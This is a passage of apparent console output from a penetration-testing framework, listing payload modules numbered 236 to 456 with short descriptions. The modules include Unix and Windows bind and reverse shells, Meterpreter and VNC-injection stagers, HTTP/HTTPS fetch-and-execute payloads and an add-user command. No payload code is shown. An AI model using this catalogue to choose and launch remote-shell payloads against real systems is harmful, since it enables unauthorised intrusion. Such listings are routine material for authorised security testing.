   236   payload/cmd/unix/bind_netcat                                                                normal  No     Unix Command Shell, Bind TCP (via netcat)
   237   payload/cmd/unix/bind_netcat_gaping                                                         normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   238   payload/cmd/unix/bind_netcat_gaping_ipv6                                                    normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   239   payload/cmd/unix/bind_nodejs                                                                normal  No     Unix Command Shell, Bind TCP (via nodejs)
   240   payload/cmd/unix/bind_perl                                                                  normal  No     Unix Command Shell, Bind TCP (via Perl)
   241   payload/cmd/unix/bind_perl_ipv6                                                             normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   242   payload/cmd/unix/bind_r                                                                     normal  No     Unix Command Shell, Bind TCP (via R)
   243   payload/cmd/unix/bind_ruby                                                                  normal  No     Unix Command Shell, Bind TCP (via Ruby)
   244   payload/cmd/unix/bind_ruby_ipv6                                                             normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   245   payload/cmd/unix/bind_socat_sctp                                                            normal  No     Unix Command Shell, Bind SCTP (via socat)
   246   payload/cmd/unix/bind_socat_udp                                                             normal  No     Unix Command Shell, Bind UDP (via socat)
   247   payload/cmd/unix/bind_stub                                                                  normal  No     Unix Command Shell, Bind TCP (stub)
   248   payload/cmd/unix/bind_zsh                                                                   normal  No     Unix Command Shell, Bind TCP (via Zsh)
   249   payload/cmd/unix/generic                                                                    normal  No     Unix Command, Generic Command Execution
   250   payload/cmd/unix/interact                                                                   normal  No     Unix Command, Interact with Established Connection
   251   payload/cmd/unix/pingback_bind                                                              normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   252   payload/cmd/unix/pingback_reverse                                                           normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   253   payload/cmd/unix/python/meterpreter/bind_tcp                                                normal  No     Python Exec, Python Meterpreter, Python Bind TCP Stager
   254   payload/cmd/unix/python/meterpreter/bind_tcp_uuid                                           normal  No     Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support
   255   payload/cmd/unix/python/meterpreter/reverse_http                                            normal  No     Python Exec, Python Meterpreter, Python Reverse HTTP Stager
   256   payload/cmd/unix/python/meterpreter/reverse_https                                           normal  No     Python Exec, Python Meterpreter, Python Reverse HTTPS Stager
   257   payload/cmd/unix/python/meterpreter/reverse_tcp                                             normal  No     Python Exec, Python Meterpreter, Python Reverse TCP Stager
   258   payload/cmd/unix/python/meterpreter/reverse_tcp_ssl                                         normal  No     Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager
   259   payload/cmd/unix/python/meterpreter/reverse_tcp_uuid                                        normal  No     Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support
   260   payload/cmd/unix/python/meterpreter_bind_tcp                                                normal  No     Python Exec, Python Meterpreter Shell, Bind TCP Inline
   261   payload/cmd/unix/python/meterpreter_reverse_http                                            normal  No     Python Exec, Python Meterpreter Shell, Reverse HTTP Inline
   262   payload/cmd/unix/python/meterpreter_reverse_https                                           normal  No     Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline
   263   payload/cmd/unix/python/meterpreter_reverse_tcp                                             normal  No     Python Exec, Python Meterpreter Shell, Reverse TCP Inline
   264   payload/cmd/unix/python/pingback_bind_tcp                                                   normal  No     Python Exec, Python Pingback, Bind TCP (via python)
   265   payload/cmd/unix/python/pingback_reverse_tcp                                                normal  No     Python Exec, Python Pingback, Reverse TCP (via python)
   266   payload/cmd/unix/python/shell_bind_tcp                                                      normal  No     Python Exec, Command Shell, Bind TCP (via python)
   267   payload/cmd/unix/python/shell_reverse_sctp                                                  normal  No     Python Exec, Command Shell, Reverse SCTP (via python)
   268   payload/cmd/unix/python/shell_reverse_tcp                                                   normal  No     Python Exec, Command Shell, Reverse TCP (via python)
   269   payload/cmd/unix/python/shell_reverse_tcp_ssl                                               normal  No     Python Exec, Command Shell, Reverse TCP SSL (via python)
   270   payload/cmd/unix/python/shell_reverse_udp                                                   normal  No     Python Exec, Command Shell, Reverse UDP (via python)
   271   payload/cmd/unix/reverse                                                                    normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   272   payload/cmd/unix/reverse_awk                                                                normal  No     Unix Command Shell, Reverse TCP (via AWK)
   273   payload/cmd/unix/reverse_bash                                                               normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   274   payload/cmd/unix/reverse_bash_telnet_ssl                                                    normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   275   payload/cmd/unix/reverse_bash_udp                                                           normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   276   payload/cmd/unix/reverse_jjs                                                                normal  No     Unix Command Shell, Reverse TCP (via jjs)
   277   payload/cmd/unix/reverse_ksh                                                                normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   278   payload/cmd/unix/reverse_lua                                                                normal  No     Unix Command Shell, Reverse TCP (via Lua)
   279   payload/cmd/unix/reverse_ncat_ssl                                                           normal  No     Unix Command Shell, Reverse TCP (via ncat)
   280   payload/cmd/unix/reverse_netcat                                                             normal  No     Unix Command Shell, Reverse TCP (via netcat)
   281   payload/cmd/unix/reverse_netcat_gaping                                                      normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   282   payload/cmd/unix/reverse_nodejs                                                             normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   283   payload/cmd/unix/reverse_openssl                                                            normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   284   payload/cmd/unix/reverse_perl                                                               normal  No     Unix Command Shell, Reverse TCP (via Perl)
   285   payload/cmd/unix/reverse_perl_ssl                                                           normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   286   payload/cmd/unix/reverse_php_ssl                                                            normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   287   payload/cmd/unix/reverse_python                                                             normal  No     Unix Command Shell, Reverse TCP (via Python)
   288   payload/cmd/unix/reverse_python_ssl                                                         normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   289   payload/cmd/unix/reverse_r                                                                  normal  No     Unix Command Shell, Reverse TCP (via R)
   290   payload/cmd/unix/reverse_ruby                                                               normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   291   payload/cmd/unix/reverse_ruby_ssl                                                           normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   292   payload/cmd/unix/reverse_socat_sctp                                                         normal  No     Unix Command Shell, Reverse SCTP (via socat)
   293   payload/cmd/unix/reverse_socat_udp                                                          normal  No     Unix Command Shell, Reverse UDP (via socat)
   294   payload/cmd/unix/reverse_ssh                                                                normal  No     Unix Command Shell, Reverse TCP SSH
   295   payload/cmd/unix/reverse_ssl_double_telnet                                                  normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   296   payload/cmd/unix/reverse_stub                                                               normal  No     Unix Command Shell, Reverse TCP (stub)
   297   payload/cmd/unix/reverse_tclsh                                                              normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   298   payload/cmd/unix/reverse_zsh                                                                normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   299   payload/cmd/windows/adduser                                                                 normal  No     Windows Execute net user /ADD CMD
   300   payload/cmd/windows/bind_lua                                                                normal  No     Windows Command Shell, Bind TCP (via Lua)
   301   payload/cmd/windows/bind_perl                                                               normal  No     Windows Command Shell, Bind TCP (via Perl)
   302   payload/cmd/windows/bind_perl_ipv6                                                          normal  No     Windows Command Shell, Bind TCP (via perl) IPv6
   303   payload/cmd/windows/bind_ruby                                                               normal  No     Windows Command Shell, Bind TCP (via Ruby)
   304   payload/cmd/windows/download_eval_vbs                                                       normal  No     Windows Executable Download and Evaluate VBS
   305   payload/cmd/windows/download_exec_vbs                                                       normal  No     Windows Executable Download and Execute (via .vbs)
   306   payload/cmd/windows/generic                                                                 normal  No     Windows Command, Generic Command Execution
   307   payload/cmd/windows/http/x64/custom/bind_ipv6_tcp                                           normal  No     HTTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager
   308   payload/cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid                                      normal  No     HTTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support
   309   payload/cmd/windows/http/x64/custom/bind_named_pipe                                         normal  No     HTTP Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager
   310   payload/cmd/windows/http/x64/custom/bind_tcp                                                normal  No     HTTP Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager
   311   payload/cmd/windows/http/x64/custom/bind_tcp_rc4                                            normal  No     HTTP Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   312   payload/cmd/windows/http/x64/custom/bind_tcp_uuid                                           normal  No     HTTP Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)
   313   payload/cmd/windows/http/x64/custom/reverse_http                                            normal  No     HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)
   314   payload/cmd/windows/http/x64/custom/reverse_https                                           normal  No     HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)
   315   payload/cmd/windows/http/x64/custom/reverse_named_pipe                                      normal  No     HTTP Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager
   316   payload/cmd/windows/http/x64/custom/reverse_tcp                                             normal  No     HTTP Fetch, Windows shellcode stage, Windows x64 Reverse TCP Stager
   317   payload/cmd/windows/http/x64/custom/reverse_tcp_rc4                                         normal  No     HTTP Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   318   payload/cmd/windows/http/x64/custom/reverse_tcp_uuid                                        normal  No     HTTP Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)
   319   payload/cmd/windows/http/x64/custom/reverse_winhttp                                         normal  No     HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)
   320   payload/cmd/windows/http/x64/custom/reverse_winhttps                                        normal  No     HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)
   321   payload/cmd/windows/http/x64/encrypted_shell/reverse_tcp                                    normal  No     HTTP Fetch, Windows Command Shell, Encrypted Reverse TCP Stager
   322   payload/cmd/windows/http/x64/encrypted_shell_reverse_tcp                                    normal  No     HTTP Fetch, Windows Encrypted Reverse Shell
   323   payload/cmd/windows/http/x64/exec                                                           normal  No     HTTP Fetch, Windows x64 Execute Command
   324   payload/cmd/windows/http/x64/loadlibrary                                                    normal  No     HTTP Fetch, Windows x64 LoadLibrary Path
   325   payload/cmd/windows/http/x64/messagebox                                                     normal  No     HTTP Fetch, Windows MessageBox x64
   326   payload/cmd/windows/http/x64/meterpreter/bind_ipv6_tcp                                      normal  No     HTTP Fetch, Windows x64 IPv6 Bind TCP Stager
   327   payload/cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid                                 normal  No     HTTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support
   328   payload/cmd/windows/http/x64/meterpreter/bind_named_pipe                                    normal  No     HTTP Fetch, Windows x64 Bind Named Pipe Stager
   329   payload/cmd/windows/http/x64/meterpreter/bind_tcp                                           normal  No     HTTP Fetch, Windows x64 Bind TCP Stager
   330   payload/cmd/windows/http/x64/meterpreter/bind_tcp_rc4                                       normal  No     HTTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   331   payload/cmd/windows/http/x64/meterpreter/bind_tcp_uuid                                      normal  No     HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64)
   332   payload/cmd/windows/http/x64/meterpreter/reverse_http                                       normal  No     HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet)
   333   payload/cmd/windows/http/x64/meterpreter/reverse_https                                      normal  No     HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet)
   334   payload/cmd/windows/http/x64/meterpreter/reverse_named_pipe                                 normal  No     HTTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager
   335   payload/cmd/windows/http/x64/meterpreter/reverse_tcp                                        normal  No     HTTP Fetch, Windows x64 Reverse TCP Stager
   336   payload/cmd/windows/http/x64/meterpreter/reverse_tcp_rc4                                    normal  No     HTTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   337   payload/cmd/windows/http/x64/meterpreter/reverse_tcp_uuid                                   normal  No     HTTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)
   338   payload/cmd/windows/http/x64/meterpreter/reverse_winhttp                                    normal  No     HTTP Fetch, Windows x64 Reverse HTTP Stager (winhttp)
   339   payload/cmd/windows/http/x64/meterpreter/reverse_winhttps                                   normal  No     HTTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp)
   340   payload/cmd/windows/http/x64/meterpreter_bind_named_pipe                                    normal  No     HTTP Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
   341   payload/cmd/windows/http/x64/meterpreter_bind_tcp                                           normal  No     HTTP Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64)
   342   payload/cmd/windows/http/x64/meterpreter_reverse_http                                       normal  No     HTTP Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64)
   343   payload/cmd/windows/http/x64/meterpreter_reverse_https                                      normal  No     HTTP Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
   344   payload/cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp                                   normal  No     HTTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
   345   payload/cmd/windows/http/x64/meterpreter_reverse_tcp                                        normal  No     HTTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64
   346   payload/cmd/windows/http/x64/peinject/bind_ipv6_tcp                                         normal  No     HTTP Fetch, Windows x64 IPv6 Bind TCP Stager
   347   payload/cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid                                    normal  No     HTTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support
   348   payload/cmd/windows/http/x64/peinject/bind_named_pipe                                       normal  No     HTTP Fetch, Windows x64 Bind Named Pipe Stager
   349   payload/cmd/windows/http/x64/peinject/bind_tcp                                              normal  No     HTTP Fetch, Windows x64 Bind TCP Stager
   350   payload/cmd/windows/http/x64/peinject/bind_tcp_rc4                                          normal  No     HTTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   351   payload/cmd/windows/http/x64/peinject/bind_tcp_uuid                                         normal  No     HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64)
   352   payload/cmd/windows/http/x64/peinject/reverse_named_pipe                                    normal  No     HTTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager
   353   payload/cmd/windows/http/x64/peinject/reverse_tcp                                           normal  No     HTTP Fetch, Windows x64 Reverse TCP Stager
   354   payload/cmd/windows/http/x64/peinject/reverse_tcp_rc4                                       normal  No     HTTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   355   payload/cmd/windows/http/x64/peinject/reverse_tcp_uuid                                      normal  No     HTTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)
   356   payload/cmd/windows/http/x64/pingback_reverse_tcp                                           normal  No     HTTP Fetch, Windows x64 Pingback, Reverse TCP Inline
   357   payload/cmd/windows/http/x64/powershell_bind_tcp                                            normal  No     HTTP Fetch
   358   payload/cmd/windows/http/x64/powershell_reverse_tcp                                         normal  No     HTTP Fetch
   359   payload/cmd/windows/http/x64/powershell_reverse_tcp_ssl                                     normal  No     HTTP Fetch
   360   payload/cmd/windows/http/x64/shell/bind_ipv6_tcp                                            normal  No     HTTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
   361   payload/cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid                                       normal  No     HTTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
   362   payload/cmd/windows/http/x64/shell/bind_named_pipe                                          normal  No     HTTP Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
   363   payload/cmd/windows/http/x64/shell/bind_tcp                                                 normal  No     HTTP Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager
   364   payload/cmd/windows/http/x64/shell/bind_tcp_rc4                                             normal  No     HTTP Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   365   payload/cmd/windows/http/x64/shell/bind_tcp_uuid                                            normal  No     HTTP Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
   366   payload/cmd/windows/http/x64/shell/reverse_tcp                                              normal  No     HTTP Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager
   367   payload/cmd/windows/http/x64/shell/reverse_tcp_rc4                                          normal  No     HTTP Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   368   payload/cmd/windows/http/x64/shell/reverse_tcp_uuid                                         normal  No     HTTP Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
   369   payload/cmd/windows/http/x64/shell_bind_tcp                                                 normal  No     HTTP Fetch, Windows x64 Command Shell, Bind TCP Inline
   370   payload/cmd/windows/http/x64/shell_reverse_tcp                                              normal  No     HTTP Fetch, Windows x64 Command Shell, Reverse TCP Inline
   371   payload/cmd/windows/http/x64/vncinject/bind_ipv6_tcp                                        normal  No     HTTP Fetch, Windows x64 IPv6 Bind TCP Stager
   372   payload/cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid                                   normal  No     HTTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support
   373   payload/cmd/windows/http/x64/vncinject/bind_named_pipe                                      normal  No     HTTP Fetch, Windows x64 Bind Named Pipe Stager
   374   payload/cmd/windows/http/x64/vncinject/bind_tcp                                             normal  No     HTTP Fetch, Windows x64 Bind TCP Stager
   375   payload/cmd/windows/http/x64/vncinject/bind_tcp_rc4                                         normal  No     HTTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   376   payload/cmd/windows/http/x64/vncinject/bind_tcp_uuid                                        normal  No     HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64)
   377   payload/cmd/windows/http/x64/vncinject/reverse_http                                         normal  No     HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet)
   378   payload/cmd/windows/http/x64/vncinject/reverse_https                                        normal  No     HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet)
   379   payload/cmd/windows/http/x64/vncinject/reverse_tcp                                          normal  No     HTTP Fetch, Windows x64 Reverse TCP Stager
   380   payload/cmd/windows/http/x64/vncinject/reverse_tcp_rc4                                      normal  No     HTTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   381   payload/cmd/windows/http/x64/vncinject/reverse_tcp_uuid                                     normal  No     HTTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)
   382   payload/cmd/windows/http/x64/vncinject/reverse_winhttp                                      normal  No     HTTP Fetch, Windows x64 Reverse HTTP Stager (winhttp)
   383   payload/cmd/windows/http/x64/vncinject/reverse_winhttps                                     normal  No     HTTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp)
   384   payload/cmd/windows/https/x64/custom/bind_ipv6_tcp                                          normal  No     HTTPS Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager
   385   payload/cmd/windows/https/x64/custom/bind_ipv6_tcp_uuid                                     normal  No     HTTPS Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support
   386   payload/cmd/windows/https/x64/custom/bind_named_pipe                                        normal  No     HTTPS Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager
   387   payload/cmd/windows/https/x64/custom/bind_tcp                                               normal  No     HTTPS Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager
   388   payload/cmd/windows/https/x64/custom/bind_tcp_rc4                                           normal  No     HTTPS Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   389   payload/cmd/windows/https/x64/custom/bind_tcp_uuid                                          normal  No     HTTPS Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)
   390   payload/cmd/windows/https/x64/custom/reverse_http                                           normal  No     HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)
   391   payload/cmd/windows/https/x64/custom/reverse_https                                          normal  No     HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)
   392   payload/cmd/windows/https/x64/custom/reverse_named_pipe                                     normal  No     HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager
   393   payload/cmd/windows/https/x64/custom/reverse_tcp                                            normal  No     HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse TCP Stager
   394   payload/cmd/windows/https/x64/custom/reverse_tcp_rc4                                        normal  No     HTTPS Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   395   payload/cmd/windows/https/x64/custom/reverse_tcp_uuid                                       normal  No     HTTPS Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)
   396   payload/cmd/windows/https/x64/custom/reverse_winhttp                                        normal  No     HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)
   397   payload/cmd/windows/https/x64/custom/reverse_winhttps                                       normal  No     HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)
   398   payload/cmd/windows/https/x64/encrypted_shell/reverse_tcp                                   normal  No     HTTPS Fetch, Windows Command Shell, Encrypted Reverse TCP Stager
   399   payload/cmd/windows/https/x64/encrypted_shell_reverse_tcp                                   normal  No     HTTPS Fetch, Windows Encrypted Reverse Shell
   400   payload/cmd/windows/https/x64/exec                                                          normal  No     HTTPS Fetch, Windows x64 Execute Command
   401   payload/cmd/windows/https/x64/loadlibrary                                                   normal  No     HTTPS Fetch, Windows x64 LoadLibrary Path
   402   payload/cmd/windows/https/x64/messagebox                                                    normal  No     HTTPS Fetch, Windows MessageBox x64
   403   payload/cmd/windows/https/x64/meterpreter/bind_ipv6_tcp                                     normal  No     HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager
   404   payload/cmd/windows/https/x64/meterpreter/bind_ipv6_tcp_uuid                                normal  No     HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support
   405   payload/cmd/windows/https/x64/meterpreter/bind_named_pipe                                   normal  No     HTTPS Fetch, Windows x64 Bind Named Pipe Stager
   406   payload/cmd/windows/https/x64/meterpreter/bind_tcp                                          normal  No     HTTPS Fetch, Windows x64 Bind TCP Stager
   407   payload/cmd/windows/https/x64/meterpreter/bind_tcp_rc4                                      normal  No     HTTPS Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   408   payload/cmd/windows/https/x64/meterpreter/bind_tcp_uuid                                     normal  No     HTTPS Fetch, Bind TCP Stager with UUID Support (Windows x64)
   409   payload/cmd/windows/https/x64/meterpreter/reverse_http                                      normal  No     HTTPS Fetch, Windows x64 Reverse HTTP Stager (wininet)
   410   payload/cmd/windows/https/x64/meterpreter/reverse_https                                     normal  No     HTTPS Fetch, Windows x64 Reverse HTTP Stager (wininet)
   411   payload/cmd/windows/https/x64/meterpreter/reverse_named_pipe                                normal  No     HTTPS Fetch, Windows x64 Reverse Named Pipe (SMB) Stager
   412   payload/cmd/windows/https/x64/meterpreter/reverse_tcp                                       normal  No     HTTPS Fetch, Windows x64 Reverse TCP Stager
   413   payload/cmd/windows/https/x64/meterpreter/reverse_tcp_rc4                                   normal  No     HTTPS Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   414   payload/cmd/windows/https/x64/meterpreter/reverse_tcp_uuid                                  normal  No     HTTPS Fetch, Reverse TCP Stager with UUID Support (Windows x64)
   415   payload/cmd/windows/https/x64/meterpreter/reverse_winhttp                                   normal  No     HTTPS Fetch, Windows x64 Reverse HTTP Stager (winhttp)
   416   payload/cmd/windows/https/x64/meterpreter/reverse_winhttps                                  normal  No     HTTPS Fetch, Windows x64 Reverse HTTPS Stager (winhttp)
   417   payload/cmd/windows/https/x64/meterpreter_bind_named_pipe                                   normal  No     HTTPS Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
   418   payload/cmd/windows/https/x64/meterpreter_bind_tcp                                          normal  No     HTTPS Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64)
   419   payload/cmd/windows/https/x64/meterpreter_reverse_http                                      normal  No     HTTPS Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64)
   420   payload/cmd/windows/https/x64/meterpreter_reverse_https                                     normal  No     HTTPS Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
   421   payload/cmd/windows/https/x64/meterpreter_reverse_ipv6_tcp                                  normal  No     HTTPS Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
   422   payload/cmd/windows/https/x64/meterpreter_reverse_tcp                                       normal  No     HTTPS Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64
   423   payload/cmd/windows/https/x64/peinject/bind_ipv6_tcp                                        normal  No     HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager
   424   payload/cmd/windows/https/x64/peinject/bind_ipv6_tcp_uuid                                   normal  No     HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support
   425   payload/cmd/windows/https/x64/peinject/bind_named_pipe                                      normal  No     HTTPS Fetch, Windows x64 Bind Named Pipe Stager
   426   payload/cmd/windows/https/x64/peinject/bind_tcp                                             normal  No     HTTPS Fetch, Windows x64 Bind TCP Stager
   427   payload/cmd/windows/https/x64/peinject/bind_tcp_rc4                                         normal  No     HTTPS Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   428   payload/cmd/windows/https/x64/peinject/bind_tcp_uuid                                        normal  No     HTTPS Fetch, Bind TCP Stager with UUID Support (Windows x64)
   429   payload/cmd/windows/https/x64/peinject/reverse_named_pipe                                   normal  No     HTTPS Fetch, Windows x64 Reverse Named Pipe (SMB) Stager
   430   payload/cmd/windows/https/x64/peinject/reverse_tcp                                          normal  No     HTTPS Fetch, Windows x64 Reverse TCP Stager
   431   payload/cmd/windows/https/x64/peinject/reverse_tcp_rc4                                      normal  No     HTTPS Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   432   payload/cmd/windows/https/x64/peinject/reverse_tcp_uuid                                     normal  No     HTTPS Fetch, Reverse TCP Stager with UUID Support (Windows x64)
   433   payload/cmd/windows/https/x64/pingback_reverse_tcp                                          normal  No     HTTPS Fetch, Windows x64 Pingback, Reverse TCP Inline
   434   payload/cmd/windows/https/x64/powershell_bind_tcp                                           normal  No     HTTPS Fetch
   435   payload/cmd/windows/https/x64/powershell_reverse_tcp                                        normal  No     HTTPS Fetch
   436   payload/cmd/windows/https/x64/powershell_reverse_tcp_ssl                                    normal  No     HTTPS Fetch
   437   payload/cmd/windows/https/x64/shell/bind_ipv6_tcp                                           normal  No     HTTPS Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
   438   payload/cmd/windows/https/x64/shell/bind_ipv6_tcp_uuid                                      normal  No     HTTPS Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
   439   payload/cmd/windows/https/x64/shell/bind_named_pipe                                         normal  No     HTTPS Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
   440   payload/cmd/windows/https/x64/shell/bind_tcp                                                normal  No     HTTPS Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager
   441   payload/cmd/windows/https/x64/shell/bind_tcp_rc4                                            normal  No     HTTPS Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   442   payload/cmd/windows/https/x64/shell/bind_tcp_uuid                                           normal  No     HTTPS Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
   443   payload/cmd/windows/https/x64/shell/reverse_tcp                                             normal  No     HTTPS Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager
   444   payload/cmd/windows/https/x64/shell/reverse_tcp_rc4                                         normal  No     HTTPS Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   445   payload/cmd/windows/https/x64/shell/reverse_tcp_uuid                                        normal  No     HTTPS Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
   446   payload/cmd/windows/https/x64/shell_bind_tcp                                                normal  No     HTTPS Fetch, Windows x64 Command Shell, Bind TCP Inline
   447   payload/cmd/windows/https/x64/shell_reverse_tcp                                             normal  No     HTTPS Fetch, Windows x64 Command Shell, Reverse TCP Inline
   448   payload/cmd/windows/https/x64/vncinject/bind_ipv6_tcp                                       normal  No     HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager
   449   payload/cmd/windows/https/x64/vncinject/bind_ipv6_tcp_uuid                                  normal  No     HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support
   450   payload/cmd/windows/https/x64/vncinject/bind_named_pipe                                     normal  No     HTTPS Fetch, Windows x64 Bind Named Pipe Stager
   451   payload/cmd/windows/https/x64/vncinject/bind_tcp                                            normal  No     HTTPS Fetch, Windows x64 Bind TCP Stager
   452   payload/cmd/windows/https/x64/vncinject/bind_tcp_rc4                                        normal  No     HTTPS Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   453   payload/cmd/windows/https/x64/vncinject/bind_tcp_uuid                                       normal  No     HTTPS Fetch, Bind TCP Stager with UUID Support (Windows x64)
   454   payload/cmd/windows/https/x64/vncinject/reverse_http                                        normal  No     HTTPS Fetch, Windows x64 Reverse HTTP Stager (wininet)
   455   payload/cmd/windows/https/x64/vncinject/reverse_https                                       normal  No     HTTPS Fetch, Windows x64 Reverse HTTP Stager (wininet)
   456   payload/cmd/windows/https/x64/vncinject/reverse_tcp                                         normal  No     HTTPS Fetch, Windows x64 Reverse TCP Stager
